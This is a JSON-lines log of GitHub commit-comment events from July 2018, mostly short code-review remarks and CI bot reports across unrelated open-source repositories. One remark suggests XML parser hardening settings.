{"id":"7941897272","type":"CommitCommentEvent","actor":{"login":"eagleivg"},"repo":{"name":"q4a/xray-16"},"payload":{"comment":{"id":29651783,"position":6,"line":248,"path":"src/xrEngine/xr_input.cpp","commit_id":"e7963eba3ff80ad60cb7be63abaef6c0569e53da","created_at":"2018-07-10T07:08:56Z","updated_at":"2018-07-10T07:08:56Z","author_association":"COLLABORATOR","body":"Yep, but look ugly. And still working wrong - in original IR_OnKeyboardHold() called at end, for all pressed buttons. Same, IR_OnKeyboardRelease() called for all not-pressed buttons and i dont understand for what this. I will move this cycle below, outside SDL_PollEvent cycle. And  add to it IR_OnKeyboardRelease():\r\n```\r\n                for (u32 i = 0; i < COUNT_KB_BUTTONS; i++)\r\n                    if (KBState[i])\r\n                        cbStack.back()->IR_OnKeyboardHold(i);\r\n                    else\r\n                        cbStack.back()->IR_OnKeyboardRelease(i);\r\n```"}},"created_at":"2018-07-10T07:08:56Z"}
{"id":"7941897507","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651784,"position":14,"line":14,"path":"Lesson 3/Route.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T07:09:00Z","updated_at":"2018-07-10T07:09:00Z","author_association":"NONE","body":"обычно текст \"имеет что-то\" означет что нужен либо аттрибут, либо метод )\r\n"}},"created_at":"2018-07-10T07:09:00Z"}
{"id":"7941897818","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29651785,"position":268,"line":533,"path":"Source/Foundation/bsfCore/Particles/BsParticleEmitter.h","commit_id":"ab30383f3b2047411ca01338000a104dfac710b7","created_at":"2018-07-10T07:09:05Z","updated_at":"2018-07-10T07:09:05Z","author_association":"CONTRIBUTOR","body":"I thought about a macro, but then I feel it hides from the user which methods he needs to implement. And if the macro was to contain implementations as well then the relevant RTTI header needs to be part of this header, but that code is private (and also, different header is included depending on the type, which is also kinda hidden by the macro). But I'd love to solve this in a cleaner way."}},"created_at":"2018-07-10T07:09:05Z"}
{"id":"7941900649","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651799,"position":14,"line":14,"path":"Lesson 3/Route.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T07:09:48Z","updated_at":"2018-07-10T07:09:48Z","author_association":"NONE","body":"насчет длины кода вопрос спорный и если посмотреть замечания в классе Поезд, то опять появляется мысль, что эти методы может и не лишние )"}},"created_at":"2018-07-10T07:09:48Z"}
{"id":"7941901525","type":"CommitCommentEvent","actor":{"login":"wyam"},"repo":{"name":"t-leguillou/tax-app"},"payload":{"comment":{"id":29651804,"position":51,"line":50,"path":"front/src/app/components/tax/tax.components.ts","commit_id":"9b627df0464ed4bb171fdee9bd2e63cf5943e582","created_at":"2018-07-10T07:10:01Z","updated_at":"2018-07-10T07:10:01Z","author_association":"NONE","body":"Remove console.log"}},"created_at":"2018-07-10T07:10:01Z"}
{"id":"7941903401","type":"CommitCommentEvent","actor":{"login":"wyam"},"repo":{"name":"t-leguillou/tax-app"},"payload":{"comment":{"id":29651808,"position":14,"line":22,"path":"front/src/app/components/history/history.components.ts","commit_id":"9b627df0464ed4bb171fdee9bd2e63cf5943e582","created_at":"2018-07-10T07:10:28Z","updated_at":"2018-07-10T07:10:28Z","author_association":"NONE","body":"remove console.log"}},"created_at":"2018-07-10T07:10:28Z"}
{"id":"7941907198","type":"CommitCommentEvent","actor":{"login":"Anobisoft"},"repo":{"name":"Anobisoft/AnobiUIKit"},"payload":{"comment":{"id":29651817,"position":null,"line":null,"path":null,"commit_id":"50f8794bfcbac043c2951f81694686c3d4dc851f","created_at":"2018-07-10T07:11:24Z","updated_at":"2018-07-10T07:11:24Z","author_association":"OWNER","body":"DESIGNABLE fixed with post_install script in Podfile, README updated "}},"created_at":"2018-07-10T07:11:24Z"}
{"id":"7941910162","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29651824,"position":null,"line":null,"path":null,"commit_id":"b64176b65cef179a0d325707f84d50e5e2a8e610","created_at":"2018-07-10T07:12:09Z","updated_at":"2018-07-10T07:12:09Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 33](https://teamcity.otenv.com/viewLog.html?buildId=8899656&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **SUCCESS**\nSummary: Tests passed: 26 Build time: 00:11:59"}},"created_at":"2018-07-10T07:12:09Z"}
{"id":"7941911420","type":"CommitCommentEvent","actor":{"login":"ShubhamChoudhary97"},"repo":{"name":"ShubhamChoudhary97/projecte"},"payload":{"comment":{"id":29651828,"position":2,"line":2,"path":"README.md","commit_id":"097863ca4c48c097fd015b733bac3d011a15401f","created_at":"2018-07-10T07:12:26Z","updated_at":"2018-07-10T07:12:26Z","author_association":"OWNER","body":"PROJECTE 'S README"}},"created_at":"2018-07-10T07:12:26Z"}
{"id":"7941911980","type":"CommitCommentEvent","actor":{"login":"mflaxman10"},"repo":{"name":"mapd/mapd-core"},"payload":{"comment":{"id":29651832,"position":null,"line":null,"path":null,"commit_id":"7cfae74c52058ba44b99c5c73216facbe62df4a3","created_at":"2018-07-10T07:12:33Z","updated_at":"2018-07-10T07:12:33Z","author_association":"NONE","body":"minor typo:  ST_Perimeter"}},"created_at":"2018-07-10T07:12:33Z"}
{"id":"7941917203","type":"CommitCommentEvent","actor":{"login":"laszlocsomor"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29651840,"position":28,"line":69,"path":"src/main/java/com/google/devtools/build/lib/exec/FilesetManifest.java","commit_id":"59f17d6e0550bf63a0b6ef182e2d63474e058ede","created_at":"2018-07-10T07:13:51Z","updated_at":"2018-07-10T07:13:51Z","author_association":"CONTRIBUTOR","body":"[`ByteSource`'s documentation](https://google.github.io/guava/releases/19.0/api/docs/com/google/common/io/ByteSource.html) says:\r\n\r\n> Unlike an InputStream, a ByteSource is not an open, stateful stream for input that can be read and closed. Instead, it is an immutable _supplier_ of InputStream instances.\r\n>\r\n> ByteSource provides two kinds of methods:\r\n>\r\n> - **Methods that return a stream:** These methods should return a _new_, independent instance each time they are called. The caller is responsible for ensuring that the returned stream is closed.\r\n> ...\r\n\r\nMy understanding is that we are responsible for closing the input stream. WDYT?"}},"created_at":"2018-07-10T07:13:51Z"}
{"id":"7941921352","type":"CommitCommentEvent","actor":{"login":"AniketTyagi"},"repo":{"name":"AniketTyagi/spirograph"},"payload":{"comment":{"id":29651847,"position":5,"line":5,"path":"sketch.js","commit_id":"257d65eedd63c48dfb38d02126b51bcdf897c9d2","created_at":"2018-07-10T07:14:53Z","updated_at":"2018-07-10T07:14:53Z","author_association":"OWNER","body":"i = how many circle will be generated in the graph"}},"created_at":"2018-07-10T07:14:53Z"}
{"id":"7941921375","type":"CommitCommentEvent","actor":{"login":"myrsloik"},"repo":{"name":"vapoursynth/vapoursynth"},"payload":{"comment":{"id":29651848,"position":null,"line":null,"path":null,"commit_id":"be35946248caaaf8fedacc042da8e03b54d81703","created_at":"2018-07-10T07:14:53Z","updated_at":"2018-07-10T07:14:53Z","author_association":"MEMBER","body":"It's too experimental to be available in release builds at all and in most cases don't produce any real improvement. "}},"created_at":"2018-07-10T07:14:53Z"}
{"id":"7941924514","type":"CommitCommentEvent","actor":{"login":"etherewind"},"repo":{"name":"etherewind/GastosApp"},"payload":{"comment":{"id":29651857,"position":null,"line":null,"path":null,"commit_id":"0eb3726ea216a44c4388853142e867460f8d9166","created_at":"2018-07-10T07:15:38Z","updated_at":"2018-07-10T07:15:38Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Eliminar Archivos GitHub](https://trello.com/c/sOwCJv6I/1-eliminar-archivos-github)"}},"created_at":"2018-07-10T07:15:38Z"}
{"id":"7941940857","type":"CommitCommentEvent","actor":{"login":"mayarali"},"repo":{"name":"BCCN-Prog/webscraping_2018"},"payload":{"comment":{"id":29651872,"position":null,"line":null,"path":null,"commit_id":"b27d7b4c5894d090d90a503a426215e03bc33cd0","created_at":"2018-07-10T07:19:25Z","updated_at":"2018-07-10T07:19:25Z","author_association":"COLLABORATOR","body":" float('3,2') rises an error. It only works if '3.2' "}},"created_at":"2018-07-10T07:19:25Z"}
{"id":"7941952720","type":"CommitCommentEvent","actor":{"login":"uno2942"},"repo":{"name":"uno2942/RogueLLGame"},"payload":{"comment":{"id":29651900,"position":33,"line":23,"path":"Assets/Scripts/Enemies/EnemyAction.cs","commit_id":"e3b0d6de960bf490a433002ace8ba1d58fdb58b7","created_at":"2018-07-10T07:22:17Z","updated_at":"2018-07-10T07:22:17Z","author_association":"OWNER","body":"AttackedBy라고 함수 명을 적는 게 좀 더 직관적이지 않을까요."}},"created_at":"2018-07-10T07:22:17Z"}
{"id":"7941953467","type":"CommitCommentEvent","actor":{"login":"Anobisoft"},"repo":{"name":"Anobisoft/AnobiUIKit"},"payload":{"comment":{"id":29651901,"position":null,"line":null,"path":null,"commit_id":"d8a16b6089f01193099c028b3f200ede808ab25f","created_at":"2018-07-10T07:22:29Z","updated_at":"2018-07-10T07:22:29Z","author_association":"OWNER","body":"## AKViewDispatcher\r\n- bugfix: single class observer addition not create observersPool"}},"created_at":"2018-07-10T07:22:29Z"}
{"id":"7941978238","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29651942,"position":144,"line":351,"path":"addons/web/static/src/js/views/graph/graph_renderer.js","commit_id":"57829a5bf5a7767fa6bae8409bc6d50b30ed38c4","created_at":"2018-07-10T07:28:57Z","updated_at":"2018-07-10T07:28:57Z","author_association":"NONE","body":"remove this and the next"}},"created_at":"2018-07-10T07:28:57Z"}
{"id":"7941979938","type":"CommitCommentEvent","actor":{"login":"parasyte"},"repo":{"name":"melonjs/melonJS"},"payload":{"comment":{"id":29651944,"position":5,"line":55,"path":"src/video/renderer.js","commit_id":"b1b43279154429e8aa4fa5afa29eddcd10bd19cc","created_at":"2018-07-10T07:29:23Z","updated_at":"2018-07-10T07:29:23Z","author_association":"MEMBER","body":"Oh, I understand. This isn’t a background color. This is the multiply color. When changed to black, it multiples the RGB components with zeroes. 😭"}},"created_at":"2018-07-10T07:29:23Z"}
{"id":"7941983146","type":"CommitCommentEvent","actor":{"login":"kinbiko"},"repo":{"name":"JStonham/notes"},"payload":{"comment":{"id":29651949,"position":2,"line":555,"path":"README.md","commit_id":"2a82098c7e727d8cfc9ed67811f9c6a59b899818","created_at":"2018-07-10T07:30:11Z","updated_at":"2018-07-10T07:30:11Z","author_association":"NONE","body":"only the commands with `git` in front are Git commands. The rest are bash (or shell) commands.\r\nMoreover, `Git` wouldn't work when running git commands whereas `git` will."}},"created_at":"2018-07-10T07:30:11Z"}
{"id":"7941983391","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29651950,"position":8,"line":21,"path":"station.rb","commit_id":"ef8dc071d5ec87ed1e9cf17ee0c2101150f3f184","created_at":"2018-07-10T07:30:15Z","updated_at":"2018-07-10T07:30:15Z","author_association":"OWNER","body":"+"}},"created_at":"2018-07-10T07:30:15Z"}
{"id":"7941983941","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29651953,"position":68,"line":649,"path":"addons/web/static/tests/views/graph_tests.js","commit_id":"57829a5bf5a7767fa6bae8409bc6d50b30ed38c4","created_at":"2018-07-10T07:30:23Z","updated_at":"2018-07-10T07:30:23Z","author_association":"NONE","body":"make sure this is useful"}},"created_at":"2018-07-10T07:30:23Z"}
{"id":"7941990325","type":"CommitCommentEvent","actor":{"login":"kinbiko"},"repo":{"name":"JStonham/notes"},"payload":{"comment":{"id":29651979,"position":8,"line":562,"path":"README.md","commit_id":"ef8d78b36a2d216bd8743523694ef60a7e67764a","created_at":"2018-07-10T07:32:00Z","updated_at":"2018-07-10T07:32:00Z","author_association":"NONE","body":"Maybe add something about how to exit vim, if you should happen to forget the -m bit?\r\n`:q!` + `enter`"}},"created_at":"2018-07-10T07:32:00Z"}
{"id":"7941990492","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MGARace"},"payload":{"comment":{"id":29651980,"position":null,"line":null,"path":null,"commit_id":"6f25bdfcbd10977094420124e32c0750035961eb","created_at":"2018-07-10T07:32:02Z","updated_at":"2018-07-10T07:32:02Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MGARace/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `54fb4cf0-8413-11e8-9273-c563c2e95851`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T07:32:02Z"}
{"id":"7941997138","type":"CommitCommentEvent","actor":{"login":"jxs-xx"},"repo":{"name":"liyiorg/weixin-popular"},"payload":{"comment":{"id":29651998,"position":null,"line":null,"path":null,"commit_id":"71c58bf00c3aff2508a35e13b24e1dcdda06c7ac","created_at":"2018-07-10T07:33:42Z","updated_at":"2018-07-10T07:33:42Z","author_association":"NONE","body":"要不要加满\r\ndbf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\r\n\t\t\tdbf.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\r\n\t\t\tdbf.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\r\n\t\t\tdbf.setFeature(\"http://apache.org/xml/features/nonvalidating/load-external-dtd\", false);\r\n\t\t\tdbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);\r\n\t\t\tdbf.setXIncludeAware(false);\r\n\t\t\tdbf.setExpandEntityReferences(false);\r\n"}},"created_at":"2018-07-10T07:33:42Z"}
{"id":"7941998339","type":"CommitCommentEvent","actor":{"login":"aimeirak"},"repo":{"name":"aimeirak/SalesTaxProblem"},"payload":{"comment":{"id":29652003,"position":10,"line":10,"path":"src/com/company/Tax.java","commit_id":"36a633e6833a8920340f877d8f01c4d4f9dce6e1","created_at":"2018-07-10T07:34:02Z","updated_at":"2018-07-10T07:34:02Z","author_association":"OWNER","body":"at the calculatesalestax() class i can insert this lines of codes\r\nif(imported && !exempted)\r\n\t\t{\r\n\t\t\ttotalTax = 0.15f;\r\n\t\t}\r\nbecouse all goods that is not exempt are rate at 10% and goods that are imported are  5% that why i take 10% for all goods which are not exempt and add 5% for goods that are imported"}},"created_at":"2018-07-10T07:34:02Z"}
{"id":"7942003171","type":"CommitCommentEvent","actor":{"login":"yesoul"},"repo":{"name":"NDCFL/baojia"},"payload":{"comment":{"id":29652010,"position":null,"line":null,"path":null,"commit_id":"d98d4d0452921f1ff99bbd22463f66a81afce0f3","created_at":"2018-07-10T07:35:17Z","updated_at":"2018-07-10T07:35:17Z","author_association":"NONE","body":"屌"}},"created_at":"2018-07-10T07:35:17Z"}
{"id":"7942008834","type":"CommitCommentEvent","actor":{"login":"marcoalopez"},"repo":{"name":"arfon/GrainSizeTools"},"payload":{"comment":{"id":29652015,"position":null,"line":null,"path":null,"commit_id":"4e475caf5fad57fe08631995d69dc5f22375fba3","created_at":"2018-07-10T07:36:45Z","updated_at":"2018-07-10T07:36:45Z","author_association":"NONE","body":"just adding the date of submission"}},"created_at":"2018-07-10T07:36:45Z"}
{"id":"7942024531","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29652054,"position":null,"line":null,"path":null,"commit_id":"cb61dc3763768bd7987a4ac8dbf13a1bd29b160a","created_at":"2018-07-10T07:40:45Z","updated_at":"2018-07-10T07:40:45Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2812 of 2972 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 133 tests had: EIO diffs.\n * 131 tests had: Table big diffs.\n * 5 tests had: ESO small diffs.\n * 4 tests had: MTR small diffs.\n * 16 tests had: ESO big diffs.\n * 1 test had: ERR diffs.\n * 4 tests had: MTR big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 612\n * Failed: 16\n\nperformance Test Summary\n * Passed: 4\n * Failed: 13\n\nregression Test Summary\n * Passed: 512\n * Failed: 131\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.62%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T07:40:45Z"}
{"id":"7942024695","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29652055,"position":null,"line":null,"path":null,"commit_id":"6de77c96fd3a8f521e157e636179e19bd5b4d246","created_at":"2018-07-10T07:40:48Z","updated_at":"2018-07-10T07:40:48Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-254](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-254).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-254-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-10T07:40:48Z"}
{"id":"7942028925","type":"CommitCommentEvent","actor":{"login":"lafrancescav"},"repo":{"name":"alexanderyoung/manager-readme"},"payload":{"comment":{"id":29652067,"position":null,"line":null,"path":null,"commit_id":"24b965660e38a6148bae039209a6f4768c3084bc","created_at":"2018-07-10T07:41:52Z","updated_at":"2018-07-10T07:41:52Z","author_association":"NONE","body":"Sounds great! Welcome aboard, Alex! :)"}},"created_at":"2018-07-10T07:41:52Z"}
{"id":"7942029066","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29652068,"position":null,"line":null,"path":null,"commit_id":"363cb07cbc952e154f65173c9eb5455e4107dc41","created_at":"2018-07-10T07:41:54Z","updated_at":"2018-07-10T07:41:54Z","author_association":"OWNER","body":"Thanks for the thorough list.  For some of the symbols in GamePhysics, I would not be surprised if they are in fact not yet used. For the others, my intuition would be that they should be used [most of them anyways], and that it is a discrepancy with the manual version which makes it currently unused.   So yes, please, do create a separate issue from the above list of symbols. "}},"created_at":"2018-07-10T07:41:54Z"}
{"id":"7942031351","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29652073,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-10T07:42:29Z","updated_at":"2018-07-10T07:42:29Z","author_association":"NONE","body":"@vondele Of course the power machine is available and you are free to test whatever you want ;-)\r\nJust let me say you that:\r\nSimplifications in SF are designed to facilitate new elo-gaining improvements. This by reducing current SF's complexity. \r\nNow your patch IMO doesn't reduce SF's complexity in a way that someone will find it more easy to tweak the skip-map for new improvements, to me it even more obfuscates what it is actually doing. Just my opinion.\r\n"}},"created_at":"2018-07-10T07:42:29Z"}
{"id":"7942033727","type":"CommitCommentEvent","actor":{"login":"ulrikpedersen"},"repo":{"name":"areaDetector/ADCore"},"payload":{"comment":{"id":29652078,"position":null,"line":null,"path":null,"commit_id":"6637eaa1a8accf306ce75e49b8beae5b607be2c8","created_at":"2018-07-10T07:43:02Z","updated_at":"2018-07-10T07:43:02Z","author_association":"MEMBER","body":"Thanks Mark!\r\n\r\n> I was not able to test that WITH_PVA=YES and WITH_QSRV=NO works on 3.14.12.\r\n\r\nThat's the config-combo that I'm trying to build at the moment. I aim to do that today..."}},"created_at":"2018-07-10T07:43:02Z"}
{"id":"7942041565","type":"CommitCommentEvent","actor":{"login":"Anobisoft"},"repo":{"name":"Anobisoft/AnobiUIKit"},"payload":{"comment":{"id":29652089,"position":null,"line":null,"path":null,"commit_id":"fc67debf3f04f9d66ece8036a5e12082f1d80b5a","created_at":"2018-07-10T07:44:51Z","updated_at":"2018-07-10T07:44:51Z","author_association":"OWNER","body":"## AKViewDispatcher\r\n- NSPointerArray replaced with NSHashTable\r\n- deprecating `cleanupObserversPool`"}},"created_at":"2018-07-10T07:44:51Z"}
{"id":"7942045748","type":"CommitCommentEvent","actor":{"login":"stephanieder"},"repo":{"name":"diya-sdk/sensor-base"},"payload":{"comment":{"id":29652100,"position":10,"line":52,"path":"sensor-base.js","commit_id":"3ce06b98d3a2e26132fc8938fc3c363d072f56b7","created_at":"2018-07-10T07:45:50Z","updated_at":"2018-07-10T07:45:50Z","author_association":"NONE","body":"lim = offset setted for the sensor"}},"created_at":"2018-07-10T07:45:50Z"}
{"id":"7942046904","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29652104,"position":null,"line":null,"path":null,"commit_id":"cb61dc3763768bd7987a4ac8dbf13a1bd29b160a","created_at":"2018-07-10T07:46:09Z","updated_at":"2018-07-10T07:46:09Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-10T07:46:09Z"}
{"id":"7942049321","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29652106,"position":null,"line":null,"path":null,"commit_id":"96aca6d7e6dc3c05d761098a19f96b82d2783b1c","created_at":"2018-07-10T07:46:44Z","updated_at":"2018-07-10T07:46:44Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/question-answer-plugin/56032/105\n"}},"created_at":"2018-07-10T07:46:44Z"}
{"id":"7942049764","type":"CommitCommentEvent","actor":{"login":"kdomino"},"repo":{"name":"kdomino/julialang.github.com"},"payload":{"comment":{"id":29652107,"position":null,"line":null,"path":null,"commit_id":"870c3e49be20fb36707f6496d11c8f1de5665091","created_at":"2018-07-10T07:46:50Z","updated_at":"2018-07-10T07:46:50Z","author_association":"OWNER","body":"I put by mistake a last link http://mitos.leloir.org.ar."}},"created_at":"2018-07-10T07:46:50Z"}
{"id":"7942050121","type":"CommitCommentEvent","actor":{"login":"CharlBest"},"repo":{"name":"angular/angular-cli"},"payload":{"comment":{"id":29652108,"position":null,"line":null,"path":null,"commit_id":"75311c2a4541cd498b5376e1a5e79f515a8c7d79","created_at":"2018-07-10T07:46:56Z","updated_at":"2018-07-10T07:46:56Z","author_association":"NONE","body":"Ok cool. Thanks"}},"created_at":"2018-07-10T07:46:56Z"}
{"id":"7942050279","type":"CommitCommentEvent","actor":{"login":"ajorquera"},"repo":{"name":"ajorquera/pano-editor"},"payload":{"comment":{"id":29652109,"position":2,"line":2,"path":"src/components/Sidebar.vue","commit_id":"7a756fc6050ac6e6ad5225f2dd8bee6fd4ceaf74","created_at":"2018-07-10T07:46:58Z","updated_at":"2018-07-10T07:46:58Z","author_association":"OWNER","body":"this nesting of v-flex seems not correct"}},"created_at":"2018-07-10T07:46:58Z"}
{"id":"7942051653","type":"CommitCommentEvent","actor":{"login":"Anobisoft"},"repo":{"name":"Anobisoft/AnobiUIKit"},"payload":{"comment":{"id":29652112,"position":null,"line":null,"path":null,"commit_id":"57c5d6766e74612b4534b1aa207d379b5b3d6f93","created_at":"2018-07-10T07:47:19Z","updated_at":"2018-07-10T07:47:19Z","author_association":"OWNER","body":"## AKViewDispatcher optimization\r\n"}},"created_at":"2018-07-10T07:47:19Z"}
{"id":"7942052219","type":"CommitCommentEvent","actor":{"login":"stephanieder"},"repo":{"name":"diya-sdk/sensor-base"},"payload":{"comment":{"id":29652114,"position":42,"line":84,"path":"sensor-base.js","commit_id":"3ce06b98d3a2e26132fc8938fc3c363d072f56b7","created_at":"2018-07-10T07:47:27Z","updated_at":"2018-07-10T07:47:27Z","author_association":"NONE","body":"fake used to know if this is a wrong values from sensor (ie if this send the offset), so we don't want to take it in the average"}},"created_at":"2018-07-10T07:47:27Z"}
{"id":"7942054594","type":"CommitCommentEvent","actor":{"login":"neben"},"repo":{"name":"sopherio/nchan"},"payload":{"comment":{"id":29652119,"position":10,"line":851,"path":"src/util/nchan_util.c","commit_id":"ee1f260ce07dc283ddabae2a3f32b969d9ddb51c","created_at":"2018-07-10T07:48:02Z","updated_at":"2018-07-10T07:48:02Z","author_association":"NONE","body":"This is basically copy/paste from the zlib [documentation](https://zlib.net/zlib_how.html), with added log. I removed the `inflateEnd` though, as I didn't want to meddle with nchan's inflate error handling. Probably there's some error handling missing, though, as nchan's interprocess alerts keep growing. At least the infinite loop is gone now."}},"created_at":"2018-07-10T07:48:02Z"}
{"id":"7942054687","type":"CommitCommentEvent","actor":{"login":"ajorquera"},"repo":{"name":"ajorquera/pano-editor"},"payload":{"comment":{"id":29652121,"position":4,"line":9,"path":"public/index.html","commit_id":"7a756fc6050ac6e6ad5225f2dd8bee6fd4ceaf74","created_at":"2018-07-10T07:48:04Z","updated_at":"2018-07-10T07:48:04Z","author_association":"OWNER","body":"I added another comment below, the rest seems ok to me"}},"created_at":"2018-07-10T07:48:04Z"}
{"id":"7942055356","type":"CommitCommentEvent","actor":{"login":"jaska120"},"repo":{"name":"Yoast/wordpress-seo"},"payload":{"comment":{"id":29652123,"position":5,"line":705,"path":"frontend/class-frontend.php","commit_id":"9aa6f1cab122136a6952d846f896d62626c92031","created_at":"2018-07-10T07:48:15Z","updated_at":"2018-07-10T07:48:15Z","author_association":"NONE","body":"Global $post could be null but `WPSEO_Utils::is_woocommerce_active() && is_shop()` could true and still on the line 706 $post is referred as a object."}},"created_at":"2018-07-10T07:48:15Z"}
{"id":"7942056180","type":"CommitCommentEvent","actor":{"login":"stephanieder"},"repo":{"name":"diya-sdk/sensor-base"},"payload":{"comment":{"id":29652124,"position":70,"line":112,"path":"sensor-base.js","commit_id":"3ce06b98d3a2e26132fc8938fc3c363d072f56b7","created_at":"2018-07-10T07:48:27Z","updated_at":"2018-07-10T07:48:27Z","author_association":"NONE","body":"if all values are wrong, it does the average with the wrong values"}},"created_at":"2018-07-10T07:48:27Z"}
{"id":"7942058845","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29652128,"position":9,"line":9,"path":"route.rb","commit_id":"983de5adfdfbe3dab8b58a5de7fba977b0293fd5","created_at":"2018-07-10T07:49:06Z","updated_at":"2018-07-10T07:49:06Z","author_association":"OWNER","body":"yasno ispravil na` insert`"}},"created_at":"2018-07-10T07:49:06Z"}
{"id":"7942059064","type":"CommitCommentEvent","actor":{"login":"wjcsharp"},"repo":{"name":"xh2006/CppUtility"},"payload":{"comment":{"id":29652130,"position":42,"line":250,"path":"network/SimpleSocket.cpp","commit_id":"1c28e12461f1508995d562ce6ef0fe7e008982b7","created_at":"2018-07-10T07:49:09Z","updated_at":"2018-07-10T07:49:09Z","author_association":"NONE","body":"Return here?"}},"created_at":"2018-07-10T07:49:09Z"}
{"id":"7942059190","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29652132,"position":null,"line":null,"path":null,"commit_id":"d8f70a5f4083273445b5f5fa9287bb341681f6f9","created_at":"2018-07-10T07:49:10Z","updated_at":"2018-07-10T07:49:10Z","author_association":"NONE","body":"Something went wrong when running [your job](https://github.com/JuliaLang/julia/commit/d8f70a5f4083273445b5f5fa9287bb341681f6f9#commitcomment-29650676):\n```\nNanosoldierError: failed to run benchmarks against primary commit: failed process: Process(`make -j3`, ProcessExited(2)) [2]\n```\nLogs and partial data can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/6da6e097d824a498d5b9764cb4148e94c3324a88/daily_2018_7_10/report.md)\ncc @ararslan"}},"created_at":"2018-07-10T07:49:10Z"}
